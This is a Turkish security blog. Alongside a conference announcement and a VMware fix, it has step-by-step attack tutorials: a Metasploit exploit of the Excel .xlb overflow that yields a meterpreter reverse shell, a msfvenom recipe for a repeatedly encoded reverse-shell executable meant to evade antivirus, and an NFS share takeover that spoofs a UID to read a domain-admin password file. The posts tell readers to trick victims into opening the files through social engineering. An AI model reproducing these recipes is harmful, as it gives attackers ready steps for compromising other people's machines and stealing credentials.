12 Ağustos 2015 Çarşamba

Siber Güvenlik Konferansı - Hacktrick

Standard
Hacktrick Konferansı Başlıyor …
Son yılların değişmez gündemini oluşturan dijital ortamdaki bilgiler ve bunların güvenliği
konusu Hacktrick’15 organizasyonunda alışılmışın dışında bir bakış açısıyla ele alınacak. Hacktrick’te bu sene eğitimler, konferanslar, yarışmalar ve turnuvalar bir arada olacak.

Octosec ekibi tarafından gönüllülük esasıyla düzenlenen etkinliğin ilkine geçtiğimiz yıl Ankara Üniversitesi ev sahipliği yapmıştı. Hacktrick’14 750 katılımcıyı sektörün önde gelen isimleriyle buluşturmuştu.

Bu yıl, genişletilmiş konsepti ve daha büyük hedefleriyle Hacktrick’15 İstanbul’da gerçekleştirilecek. Alanında uzman kişiler tarafından verilecek eğitimlerle programına başlayacak olan Hacktrick, ilk günün akşamında başlayıp ikinci günün sabahına kadar sürecek zorlu ve büyük ödüllü Capture the Flag yarışmasına sahne olacak. Sonraki iki gün, Türkiye’den ve dünyadan alanında uzman konuşmacıların sunumları ile devam edecek.

Hacktrick toplamda 16 ana oturum ile katılımcılara siber güvenlik konusunda adeta bilgi seli vaadediyor. Konferans Siber İstihbarat, Siber Güvenlik, Altyapı Güvenliği, Fiziksel Güvenlik, IoT Güvenliği gibi birçok ana başlığı içermektedir.

Hacktrick; eğitimlerin, konferansların ve CTF yarışmasının yanında katılımcıların eğlenceli ve keyifli vakit geçirmesi adına turnuvalar ve oyunlara da ev sahipliği yapacak. Futbol ve paintball turnuvalarının yanında son günlerin en popüler oyunu olan odadan kaçış oyunu ile zorlu ve bir o kadar da eğlenceli vakit geçirebilecekler.
6-7-8 Eylül 2015 tarihlerinde Sabancı Üniversitesi’nde gerçekleşecek olan Hacktrick’15 Siber Güvenlik Konferansı hakkında detaylı bilgi almak ve yerinizi ayırmak için www.hacktrickconf.com adresini ziyaret edebilirsiniz. Sizlere daha keyifli bir organizasyon sağlamamız için anketimize katılmayıda unutmayın !
Etiketler: , , ,

18 Temmuz 2015 Cumartesi

Microsoft Office 2007 Excel .xlb Buffer Overflow Zafiyeti - Detaylı Anlatım

Standard

Windows Xp Sp2 ve Sp3 'lerde bulunan Microsoft Office 2007 Excel .xlb Buffer Overflow zafiyetini test edelim. Ben daha önceden vwmare  kurmuş  olduğum XP işletim sisteminde deneyeceğim.

Kullanacağız Exploit ;
exploit/windows/fileformat/ms11_021_xlb_bof

Kali Linux'umuzu açalım ve metasploitimizi çalıştıralım. Kali'de terminalimizi açalım ve msfconsole komutumuzu yazalım.


Aşağıda bulunan Resim-1'deki gibi komutumuzu yazalım, exploitimiz ayarlarını görüntüleyelim ve çalıştıralım.

Komutumuz :

  • use exploit/windows/fileformat/ms11_021_xlb_bof
RESİM - 1

Daha sonra payloadımızı çağıralım.

  • set PAYLOAD windows/meterpreter/reverse_tcp
RESİM-2

Ayarlarımızı kontrol edelim
  • show options
RESİM-3

Kalimizin İp adresini ve portumuzu belirledikten sonra exploitimizi çalıştıralım.
  • set LHOST {Kali Linux İp Adresinizi Yazınız}
  • run
RESİM-4

msf.xlb dosyamızı oluşturduk. Şimdi dosyamızı Desktop altına kopyalayalım

  • cp /root/.msf4/local/msf.xlb /root/Desktop/
RESİM-5



  • use multi/handler

RESİM-6

Şimdi ise ip adresimizde 4444'lü portumuzu dinlemeye almak için payloadımızı yükleyelim.

  • set PAYLOAD windows/meterpreter/reverse_tcp
RESİM-7



Kali İp adresimizi girelim ve çalıştırıp  kurbanımızın açmasını bekleyelim.

  • set LHOST 192.168.5.128
  • run
RESİM-8


Şimdi bize düşen karşı tarafa bu excel dosyamızı Sosyal Mühendislik yöntemleri ile gönderip açtırmak. Ben kendi Sanal makinemde  kurmuş olduğum xp işletim sistemimde dosyamı açıp test ediyorum. Eğer işlemlerimizi doğru yaptıysak kurban dosyayı açtıktan sonra terminal ekranında meterpreter oturumunu almış olmamız gerekiyor. Dosyayı açıyorum.

RESİM-9

İşlem tamamdır artık kurbanımızın bilgisayarındayız.



Etiketler: , , , , , , , , , , , ,

9 Temmuz 2015 Perşembe

Msfvenom Kullanımı - (Detaylı)

Standard
Bu yazımda msfvenom kullanımı ve özelliklerinden bahsedeğim.
Metasploit ile gelen  msfvenom zararlı kod üretmemizi ve karşı taraftan reverse bağlantı almamızı sağlayan bir araçtır. Zararlı dosyayı oluşturup karşı tarafa Sosyal Mühendislik yöntemlerini kullanarak dosyayı açtırmayı başarmamız gerekiyor.







Öncelikle Kali Linux'umuzu açalım daha sonra terminale gelerek msfvenom -h komutunu girelim.

Resim  1

Resim 1'de görüldüğü gibi msfvenom aracının options seçeneklerini, parametrelerini ve bunların ne işe yaradıklarını görüyoruz.
Bizim Kullanacağımız parametreleri sıralayalım ;


  • -p : (Payload) Oluşturulan zararlı dosya açıldıktan sonra çalışan kod parçası
  • -e : (Encoder) Oluşturulan zararlı dosyayı antivirüslere yakalanmaması için şifreleyen araç seçiminin yapıldığı parametre
  • -i : (İterations) Oluşturulan zararlı dosyayı kaç defa şifreyeleceğini seçeceğimiz parametre
  • -b : (Bad Chars) Oluşturulan zararlı dosyanın çalışabilmesi için çıkaracağımız kötü karakterleri yazdığımız parametre
  • -f : (Format) Oluşturulan zararlı dosyayı hangi formatta kaydeceğimizi belirlediğimiz parametre
  • -a : (Architecture) Oluşturulan zararlı dosyanın hangi mimaride çalışacağını verdiğimiz parametre
  • --platform :Oluşturulan zararlı dosyanın hangi işletim sisteminde çalışacağını verdiğimiz parametre
Ben parametrelere şunları vereceğim.

  • -p : windows/meterpreter/reverse_tcp ( Kurbandan bağlantı almama yarayacak payload )
  • -e : x86/shikata_ga_nai ( Oluşturacağım zararlı dosyayı encode etmemi yarayacak encoder )
  • -i : 5 ( 5 defa encode etmesini istiyorum ) 
  • -b : \x00 ( Kötü karakteri çıkarıyorum )
  • -f : .exe ( Uygulama olarak kaydedeceğim)
  • -a : x86 ( 32 bitlik işletim sisteminde çalışmasını istiyorum )
  • --platform : windows ( Windows işletim sisteminde çalışmasını istiyorum )
  • LHOST : Kendi İp adresinizi yazın
  • LPORT : Hangi portu kullanmak istiyorsanız o portu yazın
Şimdi zararlı dosyamızı verilen parametreler ile oluşturualım. Terminale aşağıdaki gibi yazalım .

 # msfvenom -p windows/meterpreter/reverse_tcp  -e x86/shikata_ga_nai -i 5 -a x86 --platform windows LHOST=192.168.1.5 LPORT=443 -f exe  >  zararlidosya.exe

Resim 2

Resim 2 deki gibi bir çıktı aldıysanız sizde benim gibi zararlı dosyayı oluşturmuş oldunuz.
Artık yapmanız gerek Metasploitte 443'lü portunuzu dinleyeme almak ve Sosyal Mühendislik becerilerinizle karşı tarafa bu dosyayı yollayıp açtırmak.

Etiketler: , , , , , , , , , , , , , , ,

3 Temmuz 2015 Cuma

Network Sistemlerinde Bulunan NFS Zafiyeti ve Tespiti

Standard

NFS Tespiti ve Zafiyeti

Arkadaşlar bugün Nfs sisteminde bulunan çoğu zaman hackerlar tarafından krtik bilgilerin ele geçirildiği zafiyetten bahsedeceğim.

Kısaca NFS (Network File System) Nedir ?

  • UNIX'in doğal dosya paylaşım sistemidir.
  • Yerel bir ağda, birbirine bağlı Linux sistemlerin, aralarında  dosya paylaşımını sağlayan bir teknolojidir.
  • Üzerindeki dosya sisteminin  tamamını veya bir bölümünü yerel ağ üzerindeki  diğer makinelerin paylaşımına açar.
  • 2049/TCP portunda çalışır.

NFS Zafiyeti Oluşumu

Network sızma testi yapılan firmaların bir çoğunda dosya paylaşımında bir çok veri elde edilir. Biz şimdi bu paylaşımın açık olduğunu düşündüğümüz bir sistemi tespit edelim.

Kullanılan Araçlar

  • Nmap
  • Metasploit

Nmap İle Network'te NFS Servisi Tespiti

nmap -n -PN -sS -T5 -p 2049 --script=nfs-showmount  GATEWAY-ADRESİ/İP-BLOĞU

Metasploit ile Network'te NFS Servisi Tespiti

msf > use auxiliary/scanner/nfs/nfsmount
msf auxiliary(nfsmount) > set RHOSTS GATEWAY-ADRESİ/İP-BLOĞU
msf auxiliary(nfsmount) > run
Tespit edilen paylaşımlar yerel sisteme nasıl bağlanır ?

#mount -t nfs 192.168.0.1:/export/home /home/user/Desktop/baglama_dizini


Evet paylaşımı yerel sistemde Masaüstüne bağladık. Şimdi terminalde paylaşımda bulunulan argümanları ve hangi UID değeri sahip bir kullanıcıya ait olduğunu görelim.

-rwxr----- 1923 1000 1898 domainAdminveSifreleri.doc


Paylaşıma açık olan klasörde kritik bilgilerin olduğu görüyoruz. Fakat bu doc dosyasını yetkili kullanıcı UID değerine sahip bir kullanıcı ile acmamız gerekebilir. Öncelikle mount ettiğimiz bağı unmount komutuyla çözelim. Daha sonra  yerel sistemde aynı UID değere sahip olan bir kullanıcı acalım.

# umount /baglama_dizini


Evet bağımızı başarıyla çözdük. Şimdi aynı UID değere sahip kullanıcı acalım.

# useradd deneme


Kullanıcımızı açtık sıra geldi UID değerimizi vermeye.

# usermod -u 1923 deneme


UID değerimizi verdikten sonra tekrar paylaşımı yerel sisteme bağlayalım.

#mount -t nfs 192.168.0.1:/export/home /home/user/Desktop/baglama_dizini



Evet artık kritik bilgiye sahip domainAdminveSifreleri.doc adlı dosyamızı başarılı bir şekilde okuyabiliriz.



Etiketler: , , , , , , , , , , , , , , ,

VMware Workstation "kernel header path is not valid" hatası - Çözümü

Standard
VMware tool kurulumu yapılırken genellikle bu sorunla karşılaşıyoruz. Kısa ve pratik olarak aşağıda vermiş olduğum komutları terminalde çalıştırırsanız sorununuz çözülecektir.

Öncelikle Kernel sürümümüzü öğrenelim.



1- Terminale Aşağıdaki Komutu Yazın

 uname -r 

Benim kernel sürümüm : 3.18.0-kali3-amd64  olarak çıktı.Sizde farklı olabilir.
Şimdi bu bir kenarda dursun.

2- Terminale Aşağıdaki Komutu Yazın
 sudo apt-get update && sudo apt-get install build-essential linux-headers-3.18.0-kali3-amd64(Benim Kernel Sürümümü Yazdım. Siz Kendi Kernel Sürümünüzü Yazınız)

Evet Artık kaldığınız yerden devam edebilirsiniz.

Etiketler: , , , , , , ,

30 Haziran 2015 Salı

İlk Blog Yazım | Tasarım Aşamasında (:

Standard
Godaddy domain servisinden 2,20 TL'ye aldığım domainimi blogspota bağladım biraz tasarım yaptım falan derken siteyi açmış bulundum.

Bloğumda daha çok güvenlik konularına yer vermeyi düşünüyorum. Yazılarımda görüşmek üzere (:

Not: godaddy'den 2,20TL ye domain almak isteyen arkadaşlarım google.com'da "godaddy" ( ve yanına herhangi bir rakam yazsın ) Reklamı direk karşınıza çıkacaktır.



Etiketler: , , , , ,